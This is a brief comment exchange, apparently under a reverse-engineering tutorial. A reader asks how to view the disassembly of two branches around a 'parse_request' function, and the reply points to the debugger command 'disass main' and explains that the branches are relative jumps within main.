    This is only the beginning. Can you tell me how I can get the assembly code for the two branches (1 & 2, i.e. when the function parse-request actually gets executed) like it is shown in img 12 of 46? Your image is cropped, so I can't see the command you used; I assume it must be some variant of "disas main".

    Thx a lot,


    1. I can't remember off the top of my head what the functions are called. But if I remember correctly, disass main will show all of the instructions within the main function; there is also another function, I think 'parse_request' or similar. You can always do disass parse_request (or whatever it's called).

      Or, if I'm remembering completely wrong, the code for the two branch conditions is within the main function; they are just relative jumps taken if the conditions are met. So all of the code you need is in the disassembly; I didn't use any special commands or anything.

      I hope that helps.